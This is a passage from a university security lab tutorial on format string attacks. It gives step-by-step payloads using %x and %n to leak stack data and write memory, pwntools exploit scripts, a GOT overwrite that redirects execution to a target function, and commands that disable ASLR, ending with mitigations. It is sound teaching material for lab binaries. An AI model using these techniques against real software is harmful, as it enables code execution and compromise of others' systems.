placed `my_memory_write()` function. +The `my_memory_write()` allows the user to write arbitrary values to arbitrary memory addresses. + +Considering all of this, update the `TODO` lines of the `exploit.py` script to make it call the `my_evil_func()` function. + +Same as above, use `nm` to determine address of the `my_evil_func()` function. +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. +The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). + +Use the above logic to determine the `old rbp` leak and then the address of the `my_main()` return address. + +See [here](https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack "https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack") examples of using the `unpack()` function. + +In case of a successful exploit the program will spawn a shell in the `my_evil_func()` function, same as below: + +```console +$ python exploit.py +[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead +[+] Starting local process './info_leak': pid 6422 +[*] old_rbp is 0x7fffffffdd40 +[*] return address is located at is 0x7fffffffdd38 +[*] Switching to interactive mode +Returning from main! +$ id +uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) +``` + +The rule of thumb is: **Always know your string length.** + +#### Format String Attacks + +We will now see how (im)proper use of `printf` may provide us with ways of extracting information or doing actual attacks. + +Calling `printf` or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called **format string attack**. + +The definition of `printf`: + +```c +int printf(const char *format, ...); +``` + +Let's recap some of [useful formats](http://www.cplusplus.com/reference/cstdio/printf/ "http://www.cplusplus.com/reference/cstdio/printf/"): + +- `%08x` -- prints a number in hex format, meaning takes a number from the stack and prints in hex format +- `%s` -- prints a string, meaning takes a pointer from the stack and prints the string from that address +- `%n` -- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). +This format is not widely used but it is in the C standard. +- `%x` and `%n` are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user. + +### Example 2 + +```c +printf(my_string); +``` + +The above snippet is a good example of why ignoring compile time warnings is dangerous. +The given example is easily detected by a static checker. + +Try to think about: + +- The peculiarities of `printf` (variable number of arguments) +- Where `printf` stores its arguments (*hint*: on the stack) +- What happens when `my_string` is `"%x"` +- How matching between format strings (e.g. the one above) and arguments is enforced (*hint*: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers +- How we could use this to cause information leaks and arbitrary memory writes (*hint*: see the format specifiers at the beginning of the section) + +### Example 3 + +We would like to check some of the well known and not so-well known features of [the printf function](http://man7.org/linux/man-pages/man3/printf.3.html "http://man7.org/linux/man-pages/man3/printf.3.html"). +Some of them may be used for information leaking and for attacks such as format string attacks. + +Go into `printf-features/` subfolder and browse the `printf-features.c` file. +Compile the executable file using: + +```console +make +``` + +and then run the resulting executable file using + +```console +./printf-features +``` + +Go through the `printf-features.c` file again and check how print, length and conversion specifiers are used by `printf`. +We will make use of the `%n` feature that allows memory writes, a requirement for attacks. + +### Basic Format String Attack + +You will now do a basic format string attack using the `03-basic-format-string/` subfolder. +The source code is in `basic_format_string.c` and the executable is in `basic_format_string`. + +You need to use `%n` to overwrite the value of the `v` variable to `0x300`. +You have to do three steps: + +1. Determine the address of the `v` variable using `nm`. + +1. Determine the `n`-th parameter of `printf()` that you can write to using `%n`. +The `buffer` variable will have to be that parameter; you will store the address of the `v` variable in the `buffer` variable. + +1. Construct a format string that enables the attack; the number of characters processed by `printf()` until `%n` is matched will have to be `0x300`. + + +For the second step let's run the program multiple times and figure out where the `buffer` address starts. +We fill `buffer` with the `aaaa` string and we expect to discover it using the `printf()` format specifiers. + +```console +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25 + +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a + +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141 +``` + +In the last run we get the `4141414141414141` representation of `AAAAAAAA`. +That means that, if we replace the final `%lx` with `%n`, we will write at the address `0x4141414141414141` the number of characters processed so far: + +```console +$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c +162 +``` + +We need that number to be `0x300`. +You can fine tune the format string by using a construct such as `%32llx` to print a number on `32` characters instead of a maximum of `16` characters. +See how much extra room you need and see if you reach `0x300` bytes. + +The construct needn't use a multiple of `8` for length. +You may use the `%32llx` or `%33llx` or `%42llx`. +The numeric argument states the length of the print output. + +After the plan is complete, write down the attack by filling the `TODO` lines in the `exploit.py` solution skeleton. + +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. +The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). + +After you write 0x300 chars in v, you should obtain shell + +```console +$ python exploit64.py +[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead +[+] Starting local process './basic_format_string': pid 20785 +[*] Switching to interactive mode + 7fffffffdcc0 7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25 +$ +``` + +### Extra: Format String Attack + +Go to the `04-format-string/` subfolder. +In this task you will be working with a **32-bit binary**. + +The goal of this task is to call `my_evil_func` again. +This task is also tutorial based. + +```c +int main(int argc, char *argv[]) +{ + printf(argv[1]); + printf("\nThis is the most useless and insecure program!\n"); + return 0; +} +``` + +#### Transform Format String Attack to a Memory Write + +Any string that represents a useful format (e.g. `%d`, `%x` etc.) can be used to discover the vulnerability. + +```console +$ ./format "%08x %08x %08x %08x" +00000000 f759d4d3 00000002 ffd59bd4 +This is the most useless and insecure program! +``` + +The values starting with 0xf are very likely pointers. +Again, we can use this vulnerability as a information leakage. +But we want more. + +Another useful format for us is `%m$` followed by any normal format selector. +Which means that the `m`th parameter is used as an input for the following format. `%10$08x` will print the `10`th paramater with `%08x`. +This allows us to do a precise access of the stack. + +Example: + +```console +$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x" +00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 +This is the most useless and insecure program! +``` + +Note the equivalence between formats. +Now, because we are able to select *any* higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. + +```console +$ ./format "$(python -c 'print("%08x\n" * 10000)')" +``` + +Depending on your setup you should be able to view the hex +representation of the string "%08x\\n". + +**Why do we need our own buffer?** +Remember the `%n` format? +It can be used to write at an address given as parameter. +The idea is to give this address as parameter and achieve memory writing. +We will see later how to control the value. + +The next steps are done with ASLR disabled. +In order to disable ASLR, please run: + +```console +echo 0 | sudo tee /proc/sys/kernel/randomize_va_space +``` + +By trial and error or by using GDB (breakpoint on `printf`) we can determine where the buffer starts: + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"%08x\n " * 0x300)')" | grep -n 41 | head +10: ffffc410 +52: ffffcc41 +72: ffffcf41 +175: 44434241 +``` + +Command line Python exploits tend to get very tedious and hard to read when the payload gets more complex. +You can use the following reference pwntools script to write your exploit. +The code is equivalent to the above one-liner. + +```python +#!/usr/bin/env python3 +  +from pwn import * +  +stack_items = 200 +  +pad = b"ABCD" +val_fmt = b"%08x\n " +# add a \n at the end for consistency with the command line run +fmt = pad + val_fmt * stack_items + b"\n" +  +io = process(["./format", fmt]) +  +io.interactive() +``` + +Then call the `format` using: + +```console +$ python exploit.py +``` + +One idea is to keep things in multiple of 4, like "%08x \\n". +If you are looking at line `175` we have `44434241` which is the base 16 representation of `“ABCD”` (because it's little endian). +Note, you can add as many format strings you want, the start of the buffer will be the same (more or less). + +We can compress our buffer by specifying the position of the argument. + +```console +$ ./format $(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08x")') +ABCDAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAA44434241 +This is the most useless and insecure program! +``` + +`b"AAAAAAAA" * 199` is added to maintain the length of the original string, otherwise the offset might change. + +You can see that the last information is our b"ABCD" string printed with `%08x` this means that we know where our buffer is. + +You need to enable core dumps in order to reproduce the steps below: + +```console +$ ulimit -c unlimited +``` + +The steps below work an a given version of libc and a given system. +It's why the instruction that causes the fault is + +```asm +mov %edx,(%eax) +``` + +or the equivalent in Intel syntax + +```asm +mov DWORD PTR [eax], edx +``` + +It may be different on your system, for example `edx` may be replaced by `esi`, cuch as + +```asm +mov DWORD PTR [eax], esi +``` + +Update the explanations below accordingly. + +Remove any core files you may have generated before testing yourprogram: + +```console +rm -f core +``` + +We can replace `%08x` with `%n` this should lead to segmentation fault. + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08n")')" +Segmentation fault (core dumped) + +$ gdb ./format -c core +... +Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. +Program terminated with signal 11, Segmentation fault. +#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 +(gdb) bt +#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 +#1 0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6 +#2 0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18 +(gdb) x/i $eip +=> 0xf7e580a2 : mov %edx,(%eax) +(gdb) info registers $edx $eax +edx 0x202 1596 +eax 0x44434241 1145258561 +(gdb) quit +``` + +Bingo. +We have memory write. +The vulnerable code tried to write at the address `0x44434241` ("ABCD" little endian) the value 1596. +The value 1596 is the amount of data wrote so far by `printf`(`“ABCD” + 199 * “AAAAAAAA”`). + +Right now, our input string has 1605 bytes (1604 with a `n` at the end). +But we can further compress it, thus making the value that we write independent of the length of the input. + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write("ABCD" + "A" * 1588 + "%99x" + "%126$08n")')" +Segmentation fault (core dumped) + +$ gdb ./format -c core +(gdb) info registers $edx $eax +edx 0x261 1691 +eax 0x44434241 1145258561 +(gdb) quit +``` + +Here we managed to write `1691` (`4+1588+99`). +Note we should keep the number of bytes before the format string the same. +Which means that if we want to print with a padding of 100 (three digits) we should remove one `A`. +You can try this by yourself. + +**How far can we go?** +Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with `snprintf`. 255 should be enough. + +Remember, we want to write a value to a certain address. +So far we control the address, but the value is somewhat limited. +If we want to write 4 bytes at a time we can make use of the endianess of the machine. **The idea** is to write at the address n and then at the address n+1 and so on. + +Lets first display the address. +We are using the address `0x804c014`. +This address is the address of the got entry for the puts function. +Basically, we will override the got entry for the puts. + +Check the `exploit.py` script from the task directory, read the commends and understand what it does. + +```console +$ python exploit.py +[*] 'format' + Arch: i386-32-little + RELRO: Partial RELRO + Stack: No canary found + NX: NX enabled + PIE: No PIE (0x8048000) +[+] Starting local process './format': pid 29030 +[*] Switching to interactive mode +[*] Process './format' stopped with exit code 0 (pid 29030) +\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... +This is the most useless and insecure program! +``` + +The output starts with `\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018` which is the 4 addresses we have written (raw, little endian) followed by the numerical prints done with `%x` of the same addresses. + +If you have the same output it means that now, if you replace `%x` with `%n` (change `fmt = write_fmt` in the script) it will try to write something at those valid addresses. + +We want to put the value `0x080491a6`. + +```console +$ objdump -d ./format | grep my_evil +080491a6 : +``` + +As `%n` writes how many characters have been printed until it is reached, each `%n` will print an incrementally larger value. +We use the 4 adjacent adressess to write byte by byte and use overflows to reach a lower value for the next byte. +For example, after writing `0xa6` we can write `0x0191`: + +![](https://ocw.cs.pub.ro/courses/_media/cns/labs/bytes_write.png) + +Also, the `%n` count doesn\'t reset so, if we want to write `0xa6` and then `0x91` the payload should be in the form of `<0xa6 bytes>%n<0x100 - 0xa6 + 0x91 bytes>%n`. + +As mentioned earlier above, instead writing N bytes `“A” * N` you can use other format strings like `%Nc` or `%Nx` to keep the payload shorter. + +**Bonus task** Can you get a shell? +(Assume ASLR is disabled). + +#### Mitigation and Recommendations + +1. Manage the string length carefully +1. Don't use `gets`. + With `gets` there is no way of knowing how much data was read +1. Use string functions with `n` parameter, whenever a non constant string is involved. i.e. `strnprintf`, `strncat`. +1. Make sure that the `NUL` byte is added, for instance `strncpy` does **not** add a `NUL` byte. +1. Use `wcstr*` functions when dealing with wide char strings. +1. Don't trust the user! + +#### Real life Examples + +- [Heartbleed](http://xkcd.com/1354/) + Linux kernel through 3.9.4 [CVE-2013-2851](http://www.cvedetails.com/cve/CVE-2013-2851/) + The fix is [here](http://marc.info/?l=linux-kernel&m=137055204522556&w=2). + More details [here](http://www.intelligentexploit.com/view-details-ascii.html?id=16609). + +- Windows 7 [CVE-2012-1851](http://www.cvedetails.com/cve/CVE-2012-1851/) + +- Pidgin off the record plugin [CVE-2012-2369](http://www.cvedetails.com/cve/CVE-2012-2369). + The fix is [here](https://bugzilla.novell.com/show_bug.cgi?id=762498#c1) + +### Resources + +- [Secure Coding in C and C++](http://www.cert.org/books/secure-coding/) +- [String representation in C](http://www.informit.com/articles/article.aspx?p=2036582) +- [Improper string length checking](https://www.owasp.org/index.php/Improper_string_length_checking) +- [Format String definition](http://cwe.mitre.org/data/definitions/134.html) +- [Format String Attack (OWASP)](https://www.owasp.org/index.php/Format_string_attack) +- [Format String Attack (webappsec)](http://projects.webappsec.org/w/page/13246926/Format%20String) +- [strlcpy and strlcat - consistent, safe, string copy and concatenation.](http://www.gratisoft.us/todd/papers/strlcpy.html): This resource is useful to understand some of the string manipulation problems.